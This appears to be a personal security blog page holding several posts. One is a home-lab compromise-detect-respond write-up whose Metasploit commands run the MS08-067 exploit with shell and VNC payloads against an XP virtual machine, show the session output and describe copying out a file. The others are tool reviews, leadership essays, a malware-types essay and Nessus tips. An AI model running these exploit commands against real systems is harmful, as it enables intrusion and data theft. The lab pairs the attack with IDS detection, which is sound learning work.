Compromise, Detect, Respond – Project Kickoff – 001-01

I am sure that most of you have heard that in order for you to be good at any one specific security domain you need to have a solid understanding of the opposite domain as well. This is specially true between good and bad guys. You cannot be a great responder if you do not understand some of the basic techniques bad guys are using to break into your environment. Similarly, in order for you to successfully penetrate and maintain persistence in your target environment you need to understand how forensicators track your movements.

Like many of you, I have heard this concept during many presentations and conferences. And like many of you I have wondered how do I best accomplish this task myself. I, for one, aren’t an expect in any specific domain so in order for me to just catch up on the opposite domain – would actually require doing the both sides – good and bad. And so with this exact idea in mind, I am kicking off – which I am hoping is going to be a series of posts that will encompass the complete cycle: compromise -> detect -> respond (CDR).

Now, like I said in the beginning, I do not specialize in any particular domain but what I am hoping out of this project is that i will gain not only just a better but a holistic understanding of the core domains that make up infosec. So with this in mind, here is my setup.

I have setup three difference environments with the basic, free tools that will help me with each of the CDR stages:

Compromise – Metasploit, Armitage, Nessus, SET
Detect – EXE Radar Pro (trial), different A/Vs,  Snorby IDS (Thanks to dfinf2 for showing me the ropes on setting this up initially. I had to re-purpose this – but down the road i plan to expand IDS capability.)
Respond – SIFT, Redline, Splunk

In addition to the above tools repository – each environment has a diverse group of vulnerable machines that will be used as targets.

The last thing i want to cover before the official kick off is that during this whole process my goal will to be to go through all three of the CDR stages as quickly as possible with the least amount of effort. The idea behind this is that in real world there isn’t alot of time to get answers; typically you have a short period of time to get as much done as possible so that is what i plan on doing with these exercises. In addition, i will not be documenting each of the steps that i take. There are more than enough online guides that walk you through – for example how to use metasploit against a specific target so there isn’t a point for me to just duplicate that work. In fact, during these exercises I plan to use those same guides since i necessary don’t know how to use metasploit myself :)

With that i think i have covered all the overview topics that i wanted to cover. But as environments, tools and other things change i will mention them in the future posts. And now it’s time to kick off our first CDR – and whats a better way to kick off than using XP as your target!

———————

case: 001-01

Target: WinXPProSP2 @ 10.0.0.15

Compromise
I started with basic nmap reconnaissances scan to see what i had open on the target machine.

Nmap scan report for 10.0.0.15
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:91:68:A0
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

The nmap report above only shows three tcp ports open on our target system. But it does confirm the OS of the system and the network connectivity.  The next thing that i did was spend sometime searching online for XP metasploit exploits that i could use in this exercise. And in no-time i had few exploits that would give me remote access to the target system.

Here is the first one:

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

And now the payload – nothing like the VNC Inject for the first exercise!

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhot 10.0.0.15
rhot => 10.0.0.15
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.15
RHOST => 10.0.0.15
msf exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status… (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit

And just like that we have Metasploit Shell (in blue) and we can remotely see the target system’s desktop (the black command prompt windows is on the target system)

MetasploitShell

MetasploitShell

Detection

At this point we have successfully been able to compromise the target system (using probably one of the oldest exploit for XP – but we are just getting started!). But before we move forward – with little more of compromise let’s check what, if anything we have from the detection point of view after our first attack.

Here is what we see in the IDS so far:

detection_20140817-01

IDS VNC Detection

Now besides the fact that IDS triggered on our first exploit – i am even more happy to see that our IDS deployment is working overall!

Now lets look at some of the alert details. The first alert seems to be indicating that a Metasploit reverse shell with an executable code was detected. The other three alerts are related with a critical known buffer overflow vulnerability that exist in unpatched versions of MS.

Based on the above information – we have the basic information to initiate the response stage. We know the malicious source IP as well as the IP of the impacted host in our environment. But before we move forward with the response – lets just do a little bit more of compromise and see if we get successful in our second attempt or not.

Compromise 2

In the second Compromise stage, we are using the same exploit as the first Compromise (ms08_067_netapi), however our payload is now different.

msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp

payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 10.0.0.15
rhost => 10.0.0.15
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.15
[*] Command shell session 2 opened (10.0.0.23:59317 -> 10.0.0.15:4444) at 2014-06-22 17:49:04 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

As you will notice from above that our payload successfully delivered on the target system and in return give us access to target system’s shell. Now to make this scenario more interesting, I created a text file on the Windows XP target machine and named it Important.txt in My Documents under the Administrator account. Now my goal will be to read the content of that file from my metasploit system and possibly copy it out to my local hacking machine.

Accessing Important.txt File

Accessing Important.txt File

In the screenshot above we are able change directory from C:\WINDOWS\system32 and go to My Documents of the Administrator account and view the content of the Important.txt file.

So with above, our first goal is completed – we have been able to read the content of the Important.txt file. Now the second goal was to copy out the file on our local metasploit machine. For this we established another session with our target windows machine and instead of a windows shell, this time we got a meterpreter session after our payload.

Download Important.txt From Target To Local System

Download Important.txt From Target To Local System

After the successful payload delivery, we ran the getpid command to see which process on the target machine we’re binding with (this will be handy in the Response step). After that we changed directories to administrator user’s documents and downloaded the Important.txt successfully.

This concludes the Compromise 2 stage. At this time our target windows XP system is severely owned! – the IDS has triggered now total of 12 alerts related to this event:

Total IDS Alerts

Total IDS Alerts

Now we will move towards the Response phase.

Response

We already know that our Windows XP machine is compromised so we will proceed with collecting the memory of the system. In addition, we will run some sysinternal tools to confirm the networking communication to the malicious IP and determine the process which was involved in this communication…

Tagged

Support For Your Anti-Virus

Few months ago I published two blogs around having additional layers of security for your home computers. You can read them here: part 1 and part 2. The goal of those two blogs were to first bring awareness – using my personal experience around how we simply cannot rely on anti-virus software to protect our personal computers. And second to demonstrate how effective some free browser extensions are in reducing unwanted and potentially malicious programs from downloading in the background without much of our knowledge or interaction.

This blog is not exactly a continuation of the other two but it is definitely related. While in the previous posts I focused on free extensions, however in this post I want to talk about an application that is though not free but definitely worth looking into.

The EXE Radar Pro application from NoVirusThanks group (besides this particular software this group has bunch of free and extremely useful online utilities that I have been using for sometime and you should check those out too!). As far as the EXE Radar Pro goes – it is for $19.99 with the option to try free for 30 days. They do a pretty straight forward job explaining what the software does so I won’t waste time repeating what is already there. Instead I will briefly explain my experience with this software; both the pros and cons.

First the pros: the software is easy to install and seems to get to work immediately. There isn’t a lot of configuration or overly complicated interface that you need to worry about; it simply sits in your windows tray and all of the management is done by selecting the tray icon. Some of the more specific features that I like about this software is that I think this is the closest that you can get to an enterprise level endpoint monitoring software for such a low price. The software pretty much tracks all the running system processes, the associated parent process and monitors as new processes start. You also have to ability to tag  processes to either a blacklist or a whitelist based on what you think should be allowed or blocked. The software does prompt you when it thinks a suspicious/unknown process is trying to run. I believe some of the basic checks that it does to determine a good from a bad process it by simply checking if the process itself is digitally signed and if the process is making any specific/unusual command arguments. If fact it presents all this information on the prompt dialog:

EXE Radar Pro - Prompt Alert

 

From the dialog above you can simply choose to allow, block or use the drop down arrow to add the process to either the white/black list.  While the above dialog box is well designed and self explanatory – I also experienced some annoying cons with this dialog. For example, when you are prompted with the dialog box you do not have the option to ignore it. You can move it around the screen to get it out of the way but you have to make the decision to either allow/block. In addition, until you make your selection – you will not be able to execute another process. For example, when the above prompt came up on my screen and I wanted to take the screenshot using the Microsoft built-in snipping tool – I was not able to because the snipping application would not execute until I made my selection on the dialog box (I was able to do it using the keyboard print screen key).

Second major con that I experienced is that on each boot of the system there would a half-dozen prompts that I had to go through before the system would be fully up and functional. I understand that there is some learning that is involved in the beginning for the software but even after two weeks and several whitelistings I would still receive numerous prompt during startup. And as you can imagine, when you are trying to get something done quickly – these prompt becoming irritating. In fact, one of the applications that EXE Radar Pro did not like in particular was Splunk. Well before I downloaded EXE Radar Pro – I had the Splunk Free installed on the computer to do basic log analysis. But when I installed EXE Radar Pro – I would constantly get prompts. Eventually, I became irritated and ended up uninstalling Splunk from the system. In fact, even during the uninstall process of Splunk, I had to hit Allow at least 8 times before the uninstall process completed.

Overall, EXE Radar Pro is a good software for personal use because it provides that additional layer of protection and control around what runs in your system. I would say that while the interface is simple and self explanatory – an average user may not appreciate the frequency of the prompts, the technical  details and the decision making that would be required. On the other hand, if you like have such visibility and control of your system then for $19.99 you cannot go wrong with this software!

 

Tagged

Overcoming Leadership Challenges – Part 2 : Current Times

Second part. Read the first part here.

There are several successful leaders from recent times that practiced Hannibal-like leadership style; A.P. Giannini is one of them – the man who created the largest bank in the United States, the Bank of America. Like Hannibal, Giannini started working at an early age and taught himself the ropes of the business. He believed in the unconventional ways of running banks such as lending loans to immigrants when no one else did. In addition, he was also very innovative and quickly adapted to situations. For example, when fires began to spread to cities from the destructive earthquake many banks saved their deposits in steel vaults for protection. However, anticipating the damage fire would have on steel, Giannini knew it would take weeks before they will be able to open the vault. So unlike other bankers, Giannini decided to removed the gold and securities from his vaults before and was immediately able lend loans to thousands of people who suffered from the earthquake. In addition, while other banks were struggling to open their vaults, Giannini learned the importance of having geographical presents of banks. This resulted in purchases of small banks in different states and made Bank of American the first bank to cross state lines. Lastly, like Hannibal, Giannini was not in it for the money; each year he only paid himself $50,000 and toward the end of his career when he was awarded $1.5 million bonus, he donated it to University of California.

Throughout his lifetime, Hannibal had to make numerous difficult decisions in times of crisis and motivated soldiers to continue their support while together achieving that common goal. Likewise, Lee Iacocca is an inspiring individual who saved the desperate Chrysler Corporation. Before joining Chrysler in 1978, Iacocca was president at Ford Motor Company and developed popular models like Mustang. However, the CEO of Ford did not like Iacocca and despite all of Iacocca’s accomplishments for the company he refused to make him the CEO; shortly after which Iacocca was let-go from Ford.

At the same time, Chrysler was facing tremendous amount of challenges and was quickly reaching complete shutdown. Iacocca accepted Chrysler’s offer for the CEO position and agreed to not take any compensation unless the company got back up on its feet. Iacocca understood the severity of the situation however, like Hannibal was driven to destroy Rome, Iacocca ultimately wanted to prove Ford wrong for letting him go. To bring the company around, Iacocca had to persuade the federal government to lend loans to Chrysler arguing that the country could not afford for such a huge domestic auto manufacture to fail. The congress agreed to loan Chrysler $1.5 billion with the condition that it will pay back the government $2 billion on its own.
To bring change to the organization Iacocca had to make tough decisions; he had to persuade and gain trust of workers to accept layoffs and cut wages to save the company. Iacocca decided to discontinue production of less popular models and introduced a new line of models, same which were rejected at Ford and ultimately became Chrysler’s most profitable lineup. Lastly, Iacocca went public to improve companies reputation and was featured in commercial with the slogan of The pride is back.
In the end, Chrysler regained its reputation and profits while paying back the government much in advance. This was all made possible because of Iacocca’s Hannibal-like leadership style where he was driven by his mission and made others believe on his mission too.
In conclusion, Hannibal was a leader whose sole motivator was his mission and not personal gain of wealth; which I think played a major role in his success. He was a sharp thinker and was able to effectively bring unconventional ideas to life. In today’s competitive business world, this “translates into doing what has never been done before in industries where giants like Rome already exist.”

Moreover, I personally liked the comparison of Hannibal and Iacocca. The reason beginning is that in the recent recession the American auto industry faced similar situation where they had to convince the government that they were “too big to fail”. Despite the scrutiny from the public, the auto industry was awarded bailout money. And fortunately, like before they came back stronger and began paying back to the government. In addition, Chrysler used the same come-back approach as they did in 1980s where it introduced new innovative models like the all-electric Volt and the Imported from Detroit slogan.

I think the example of Chrysler beautifully shows that despite the changing times the successful leadership styles are the same. Like Hannibal, current leaders need demonstrate an “irresistible will, intense focus, and a disciplined approach” in order to be successful and lead.

Tagged , , ,

Overcoming Leadership Challenges – Part 1 : In History

Not too long ago I had the opportunity of reading:  Forbes, Steve, and John Prevas. “Hannibal of Carthage .” Power ambition glory: the stunning parallels between great leaders of the ancient world and today — and the lessons you can learn. New York: Crown Business, 2009. Based on this reading, I am writing posts on the lessons that we can learn from Hannibal’s amazing leadership and also look at some successful leaders from recent times that I believe practiced Hannibal-like leadership style.


Whenever we remember a successful or an unsuccessful leader we tend to remember them for what they did. For example, we recognize Cyrus and Alexander for conquering and building empires. However, it is equally important to distinguish a leader for how he did things rather than just for what he did. Hannibal is one of those leaders in history who did the impossible: he led armies over mountains that no one thought could be crossed, and he went against a force that no one thought could be beaten. Hannibal was able to achieve such success by following the simple principles of staying focused, thinking ahead and managing details.

Hannibal was the son of Hamilclar who was the army general of an ancient state Carthage; located 300 miles from Rome. From the age of nine Hannibal accompanied his father in battles and like his father he soon grew eternal hatred for Rome. “I swear that so soon as age will permit…I will use fire and steel to arrest the destiny of Rome.”Soon after his father’s death Hannibal took command of the army and launched the mission against which he had been sworn.
One of the main reasons behind Hannibal’s unconventional success was his strong focus on the mission and respect for his followers. From the beginning, Hannibal strongly believed that as a leader if you provide enough motivation, discipline and means for excelling self-interest you can get people to follow you to do anything. Like the other leaders of his time, Hannibal’s leadership style was authoritative and precise however; he understood the importance of getting constant feedback from those he commanded. He led by example and never asked his soldiers to do anything that he would not be willing to do himself. That’s why a major portion of his leadership was around training and rewarding his soldiers; many of whom came from lower classes of society. In addition, Hannibal possessed incredible self-control and lived modestly. He “put his mission over his personal comforts and resisted being corrupted by wealth and success.

Moreover, Hannibal was a leader who always thought ahead in the future and projected outcomes. He was one of the few leaders who recognized the importance of having broader knowledge other than just military and political affairs. Before leaving for the war, he surrounded himself with scholars and learned both Greek and Latin – for cultural and strategic advantages. Soon he realized that the war between Rome and Carthage was inevitable and decided to take the first initiative which led to the Second Punic War.
Hannibal won several notable battles in Italy however his greatest accomplishment was crossing of the Alps – one of the most dangerous and treacherous mountain range covered with constant snow and unexpected weather conditions. Hannibal had 80,000 infantry, 12,000 cavalry, and 40 war elephants. Through this journey, they encountered several local tribes that attempted to initiate battles, however despite suggestions from his officers Hannibal refused to mobilize his soldiers. While some soldiers thought of this as a cowardly behavior on Hannibal’s behalf however, this is an example of thinking-ahead quality that Hannibal possessed. In addition, this shows great component of Hannibal’s leadership “understanding which battles are important to win and which would simply waste resources and deflect attention from the objectives.”

Nevertheless, by the time they finished crossing the mountain Hannibal had lost several good soldiers and the ones left were extremely tired and weak. Even though, Hannibal was able to motivate his soldiers to keeping moving by promising them “enough gold, silver, and slaves for a new start in lifehe knew that he had a bigger problem to handle. Hannibal knew that he could not take his soldiers with such lack of energy into traditional battle and had to think strategically. In the first encounter with Romans, Hannibal decided to attack in dark early morning through freezing water; which seemed as a suicidal tactic to his officers. However, Hannibal’s plan involved ambush attack behind enemy lines which would surround enemy-soldiers when they retreated. Likewise, in another attack Hannibal positioned his soldiers in such manners that the rising sun on the morning of the battle would blind the Romans and the dust raised by all the movement of men and animals would blow into the faces of the enemy as they advanced. Such great attention to detail from Hannibal greatly helped him win numerous battles and overcome obstacles. “Hannibal won his battles because he exploited every advantage that terrain, weather, and psychology could afford him.”

Tagged ,

LAYERED SECURITY FOR HOME USER – PART 2

This is the second part of my layered security for home users topic. Please read the part 1 first to get the full background.

Recently my father purchased a new laptop for both personal and work use. And like many parents, he is decent when it comes to technology; he is able to perform many of the basic computer functions such as email, YouTube, Skype, social media and online searches. But when it comes to security, like many others he simply relies on the anti-virus software. I usually install the anti-virus software and configure schedule scans for him but this time he was away and had his computer setup from the store he purchased it from. The store tech support installed the Norton 360 Suite. Now, even though I have my preferences when it comes to different anti-virus software vendors but when it comes to layered security it does not matter.

My father used his new laptop for roughly two months before he had me look at it. At first glance the system looked fine; the Norton 360 was not complaining about anything and the system performance was also fine. But when I opened the browsers (IE & Chrome) it was hard to locate the address bar – because the browser windows were covered with numerous advertising toolbars. Also, both browsers had a different home page and default search engines had changed as well. At this point I knew that some clean up was needed.

I started with my go-to-software: Malwarebytes. I used it to perform a full sweep of the system and after 3hrs it came back with more than 200 findings. And when I looked at the scan logs I found something interesting. Beside a hand-full of malicious executables, everything else was categorized as PUPs -Potentially Unwanted Program: “is a piece of software that is also downloaded when a user downloads a specific program or application.”

Now I have a previous experience responding to malicious activity generated by PUPs. Usually, this was done through an IDS alert when one of these PUPs beacon out. But in this case, my father’s system did not generate any IDS alerts; maybe because it had only been on the network for less than 3hrs. Regardless, I decided to remove all of the findings and than confirmed their removal by doing a subsequent scan.

And this is where the fun part begins. What do you do when you have cleaned up an infected system? Well, it’s time to place few protective measures. Most tech support personals perform this step by simply selling and installing a different anti-virus software. But this measure fails immediately because they do not take the time to understand how the system got infected in the first place and how the user uses his/her system.

In my father’s case, the system got infected due to his careless behavior while surfing online; this usually happens when he is searching. He has hard time differentiating between legitimate links verses advertisements. And because of this, he tends to click on popups. Now, in a perfect world you would do some security knowledge transfer and hope for a change in the behavior. However, this is not that easy so we have to complement this with something else. This is what has worked in my case: ad blocker.

I installed the AdBlock browser extension for both IE and Chrome on my father’s computer. This was in complement to activating browsers built-in popup blocking functionality. The Adblock “blocks banners, pop-ups and video ads – even on Facebook and YouTube” – which is perfect for someone who surfaces the web most of the time.

However, in addition to ad-blocker, I also installed the DoNotTrackMe extension. The reason for this was because  even though Adblock does a great job in blocking popups and other online advertisements but there is only so much that it can do due to today’s smart-advertisements. It is no surprise that online advertisement these days is very targeted – your online browsing behavior is tracked and based on this behavior you are presented with advertisements. This makes it extremely difficult to differentiate between legitimate search results verses advertisements.

During the time that I monitored my fathers machine (~3 weeks) with both of these extensions enabled, i noticed a significant decrease in the number of malware and PUPs installed on the system. In fact, during this time I ran 4 malwarebyte scans and it came back with between 5-8 findings. Interesting enough, by the end of my monitoring the Adblock extension had blocked 6,370 ads and DoNotTrackMe blocked 4,269 trackers.

In conclusion, layered security has proven to be effective in our enterprises and now its time that we take this idea and implement it in our home systems. The free browser extension solution that I present here is by no means complete or elaborate however, in my test above it has proven to be effective in blocking drive-by downloads (at a basic level) at a $0 cost!

Tagged , ,

Zotero Review

Browser extension: Zotero

The most difficult part in the research process is keeping track of all of your sources. The traditional methods have been that you print all the pages that you visit, or copy and paste the text from the web sources onto a Word document. However, the problem with those methods is not only are they troublesome but also the chance of misplacing them are greater. Moreover, when you are done with your paper and you have to create citation for each of your sources one-by-one is not only time consuming but also increases factor of human error.

Zotero is a free Mozilla Firefox add-on which makes it easy to organize your sources and searches. It does that by saving the snapshot of the pages and saving the links. The best feature of the add-on is that it automatically creates citation for your saved sources in both APA and MLA format. In addition, since it is fully compatible with both Microsoft Office and Open Office; you can directory copy your citation into those softwares.

Another great feature that I like is that you are able to sync your files with Zotero’s online server. This provides not only sense of security that your files are backed up, but also if you log-in from an alternative computer you can still view all your saved sources. In addition, Zotero allow you to share your source with other people. For that, all you have to do is create a new group, place the files that you want to share and sync. You can send invitation to your group to as many people as you want and they can all view and make changes to your document. This makes group collaboration much easier.

Personally, I’ve been just introduced to Zotero and I love all the user-friendly features that it has to offer. Whenever I am surfing the internet and I come across any article of news that I could use later I simply open Zotero add-on and save a snapshot. In addition, Zotero’s highlight feature comes very handy as well. It allows me to highlight text right from the snapshot so that when I come back to that article I know exactly why I saved it in the original place.

Zotero is still an underdevelopment project. It has a dedicated link on its home page which allows enthusiastic individuals to contribute their new ideas or making improvements. For new user, they have great support page which comprehensively explain all the great features of Zotero.

The only thing that I am on the lookout for is Zotero coming onto different browser platforms. Currently it is only support by Mozilla Firefox but that holds a certain disadvantage against it. In addition, I have noticed in occasional events that the sync features takes longer than usually. This could be due to their storage or the format that they are using.

Overall, I think Zotero is a great free tool for everyone who wants to efficiently save time and sources. I most favorite feature of Zotero is highlight and share. I am sure that the few glitches that Zotero currently has will soon disappear.

Tagged

Layered Security For Home User – Part 1

Most who work in information security are familiar with the term layered security (also known as layered defense) which in a nutshell mean that you employ multiple solutions/components to protect your assets. This idea has been pushed at enterprise level for a years and has been significantly effective at deterring attacks. And with the latest advancements in the end-point-monitoring (EPM) solutions, enterprises now have the capability to both monitor and control what happens on all of the workstations in the environment.

But if you move away from enterprise security to securing the average home user, most users tend to relay solely on the anti-virus solutions. Now, I am not going to get in the debate over how effective or ineffective anti-virus solutions are – but if you are interested in read rants over this topic feel free to do so. However, what I will say is that just having anti-virus software (specially now) definitely does not meet the layered security concept.

So, how do we get layered security for home computers? Well, the market is not shy from variety of different solutions that will promise to compliment your existing anti-virus while providing you the benefit of added security. And in my opinion some of these products can actually be beneficial such as malware, spyware and email protection but most of these features are already build-in to to latest anti-virus solutions – you may just not know it. So, the question still stands, how do we get layered security for home computers? Well, let me answer this by explaining a recent event where I had the opportunity to test a theory first hand….

 

Tagged , ,

Security Valentines

HiddenText

So for Valentines, I decided to create a Hashtag #SecurityValentinespartly for some fun but also to get some ideas together for simple security messages.

Roses are red,
Violets are blue,
I’m sat here,
Waiting to help you.

Roses are red
Violets are blue
All my base
Are belong to you

Snort is good
Kali is better
Get that signature
On the authorising letter

I hacked in
Found the data
I’m zipping it up
To exfiltrate later

Talk to me

I’m a Social Engineer
I won’t use your password
There’s nothing to fear (honest!)

I really regret
The hacker I dated
Get me a WAF
I’ve been penetrated. (Source David Powell)

I’m a virus
I’m here to destroy
There’s also a backdoor
That was my ploy

Give me your money
Ransomware is here
I’ll give you your data
After I’ve had this beer

Roses are red
Your password was weak

View original post 362 more words

Traditional Threats

Below is my take on the common threats against our systems:

In today’s technological environment, risks to computer information are everywhere. These risks start when you power-on your system and save any information on it. However, the risks exponentially grow when you connect your system to a network and access the internet.

Information security is known as the process of implementing the necessary measurements to not only protect the physical environment but also prevent modification, deletion and unauthorized access to information.

The need for information security is vital more than ever. The numbers of incident that involve information breaches have dramatically increased in last few years. Most of these computer attacks exploit confidential information from companies’ networks (Tarte). Experts believe that the reason behind this increase is due to open vulnerabilities in corporate networks.  Attackers are able to easily abuse these weaknesses and gain access to confidential information. However, attacks have also grown to be more sophisticated than ever. In most cases, victims do not realize that they are under attack until it is too late. It’s hard to believe but attackers are able to remain “inside a compromised organization for months, gathering information with which they design and build even more sophisticated attacks” (Neal).

 In addition, these cyber attacks are not only aimed against governments and major corporation networks but also to average consumers. Study conducted by Symantec shows that “65% of people globally have experienced some type of cybercrime” (Schwartz). Almost half of these incidents were caused by viruses and malwares; while others were caused by phishing and social networking attacks (Schwartz). Moreover, the most common threat to today’s systems is from malicious codes. This category of software threat includes viruses, Trojan horses, logical bombs and worms.

Malicious code is a threat which is defined to perform unlawful, desired function which allows unauthorized access to confidential information.  These codes are capable of bypassing security software and destroy the system. It is very important that the necessary steps are taken to protect systems against these malicious codes. However, it is vital that we first differentiate among varies malicious codes (Computer virus: the types of viruses out there).

Viruses are the most common type of malicious code. This software enters the system using one the following ways: through email, peer-to-peer sites or by using infected removal media, such as flash drive. In some cases viruses simply reside on the victims system, however, usually viruses are designed to destroy the data and operating system as well as spread to other systems. Upon getting infected, viruses usually take complete control of the system; by flashing annoying pop-ups and denying users full access. However, in rare cases viruses hide their presents from the user. In both cases, the system significantly slows down and free disk space rapidly decreases. In severe instances, system could mysteriously shut itself down and/or doesn’t reboot with, BSOD (Blue Screen of Death) error (Dulaney).

Moreover, viruses are programmed to conduct two terrible tasks: bring your system to a halt, where it is no longer usable or to use your system as means to spread to other systems. Upon infecting a system, virus attaches itself to all the data and system files on that particular computer. This makes it easy for virus to spread to other systems. The most common method of spreading is through Flash drives; however the more sophisticated viruses could attach themselves to emails without user’s awareness.

Unlike before, the security administrators of today are faced with the difficulty of identifying the exact type and characterizes of certain virus before taking the necessary removal actions. Following are the most common and challenging virus types. Armored virus is programmed to hide itself from any anti-virus software. It does that by have a second-set of code or a decoy code which protects the actual code from detection.  Companion virus works similar to armored virus in sense that it hides itself from detection; however, it accomplishes such task by associating itself as an extension to a legitimate application. When user opens that application, companion virus executes instead of the actual application. This type of virus is often used to corrupt Windows systems by manipulating the Registry (Computer virus: the types of viruses out there).

Moreover, the goal of computer is to make lives of its users easier, and macro offers exactly that. It allows the user to code series of commands which are saved and can be executed automatically and repeatedly. These macros are usually used for Microsoft applications such as Word and Excel. Macro virus exploits the actual function of the macros and spread itself to other systems. “Macro viruses are the fastest growing exploitation today” (Dulaney).  In addition, there is another type of virus which attacks the system in several different ways. Multipartite virus embeds itself in the boot sector of the operating system as well as it attaches to all the executable files in the system. The idea behind this virus is that the user won’t be able to control this virus and meanwhile virus will continue infestation process (Dulaney). Likewise, stealth virus also attaches itself to the boot sector of the hard drive. When a user runs anti-virus software, stealth virus redirects the commands around itself which makes it hard to detect this infection. This virus holds the capabilities of relocating itself from one location to another while the anti-virus software is in process.

Moreover, phage virus attaches itself to programs and databases but it also modifies applications. The only way to successfully remove this infection is by reinstalling the application. The reason for that is because if any file is missed, the infection processes will initiate again and spread throughout the system.  Another powerful infection is polymorphic virus. Unlike all the other infections, this virus encrypts part of itself to avoid detection. This makes it difficult for anti-virus software to detect this infection (Dulaney). Polymorphic viruses’ characteristics are referred to as mutation, because it changes itself often to hide from antivirus software. Similarly, retrovirus bypasses itself and gets access to the system. Unlike all other infections that hide themselves from anti-virus software, retrovirus directly attacks the anti-virus software installed on the system. Due to the power of this virus, it destroys the systems anti-virus software where it’s not longer functional. However, the user continues to believe that the installed anti-virus software is fully functional and that the system is protected (Dulaney).

It is important to differentiate additional threats that are often misinterpreted as viruses.

The two most common troublesome non-virus threats are: spam and worms.

Spam is defined as “copies of the same message, in an attempt to force the message to people who would not otherwise choose to receive it” (Mueller). Most often spam consists private advertising and “get-rich-quick” schemes (Mueller). The attacker gathers information by stealing mailing lists and retrieving email addresses from the web. Even though most users ignore spam and mark it as junk to prevent receiving it in the future. However, users that open spam ultimately get overwhelmed by the amount of spam they begin to receive. Besides being annoying, spam does cost the Internet Service Provider to transmit which in result costs the end user (Mueller).

On the other hand, worm is different from a typical virus in sense that I can reproduce itself without the need of any host. “Many of the so-called viruses that have made the papers and media were, in actuality, worms and not viruses” (Dulaney). The most devastating example of worm is Melissa, which spread to more than 100,000 systems and one location was attacked with 32,000 copies in 45-minutes (Dulaney). Worms are designed to propagate using TCP/IP, emails, internet services and other means.

Protection:   

Even though it is impossible to completely protect your system, however if proper procedure is followed the likelihood of becoming a victim decreases. “The best defense against a virus attack is up-to-date antivirus software installed and running” (Dulaney). Usually the systems that become victim of attacks don’t have updated anti-virus installed or there wasn’t automatic scan setup. In addition, if you have multiple systems it is recommended that you install anti-virus software from different vendor on each system. However, the most common mistake that users make is that they install two different anti-virus software on the same system. Doing so makes both software work against each other and ultimately provides no protection to the system. Lastly, it is vital that the user is educated on preventing methods. Regardless of how superior your anti-virus software it; eventually the responsibility comes down to the end user. The user needs to be made aware of the potential threats and how to protect the system from them. “They need to scan every disk, e-mail, and documents they receive before they open them” (Dulaney). Education is the key in protecting information security. In the corporate environment all the staff members need to be trained on the importance of information security. This training should be followed by consequences for individuals who consistently fail to take information security seriously.

________________________________________________________________________________

References

Computer virus: the types of viruses out there. (n.d.). Retrieved September12, 2010, from http://www.spamlaws.com/virus-types.html
Dulaney, E. (2009). Comptia security+ deluxe. Indianapolis, Indiana: Wiley Publishing, Inc.
McGraw, G, & Morrisett, Greg. (2000). Attacking malicious code: a report to the infosec research council. IEEE Software.
Mueller, S. (n.d.). What is spam?. Retrieved September 27, 2010, from, http://spam.abuse.net/overview/whatisspam.shtml
Neal, D. (2010, September 17). Cyber attacks growing in number and sophistication. Retrieved September 19, 2010, from http://www.v3.co.uk/v3/news/2269980/firms-open-range-security?page=1
Online threats. (n.d.). Retrieved September 18, 2010, from http://www.staysafeonline.org/content/online-threats
Parks, D. (2009, August 28). The common threats to it security. Retrieved September 15, 2010, from, http://www.articlesbase.com/software-articles/the-common-threats-to-it-security-1171518.html
Scwartz, Mathew. (2010, September 08). Symantec finds 65% have been hit by cybercrime. Retrieved September 15, 2010 from, http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=227300362&subSection=Attacks/breaches
Tagged , , , ,

Finding Known Evil With Nessus – Part 2

This post is a continuation of my earlier post about finding known bad process with Nessus vulnerability scans. In this post I will share my experience after I finished running my first scan using this new scan policy.

Unlike the regular vulnerability scans, the duration for this scan was much less. The reason for this was because the scan policy consisted of only selected plugins. However, even with only selected plugins, the scan results were very comprehensive.

First, the scan result show the MD5 hash of the suspicious process. Now you can take this MD5 hash and search sites like VirusTotal but on the scan results page you will find a direct link to a Tenable website that will provide additional information about the suspicious process. This information is similar to what you would find on VirusTotal but with little less information. In my case I still searched VirusTotal for more detailed information.

Second, the scan result show the path of where the suspicious process in located on the target system. Obviously, this is great because now you don’t have to search the system and locate the executable in question. But what’s even better is that the scan results even show all the instances of that suspicious process that the scan found. For example, in my test scan the same suspicious process was located under numerous user profiles.

With the above information in hand, you can quickly develop you indicators of compromise (IOCs) and begin your investigation. My initial step was to review all the processes on my target machine and identity the process ID (PID) of the executable that the scanner identified. From here you can look at all the network connections related to this process, the system handles, any additional sub-processes, etc.

Overall, I am satisfied with what I have seen so far. I think that it is great that Tenable has incorporated these checks because in my option it makes perfect sense to check for known bad stuff during the time that you have already allocated for vulnerability scans. However, I would recommend that you separate your suspicious process and vulnerability data because do you not want to alarm the system owners without properly doing your own investigation. The easiest way to do this is by creating two different repositories and then drafting different reports/dashboards from each of those repositories.

My final comment is that if you have Nessus (I used SecurityCenter); please try to run this scan with the new scan policy. You can find the link to download this scan policy in my first post. Let me know what you guys think!

Tagged , ,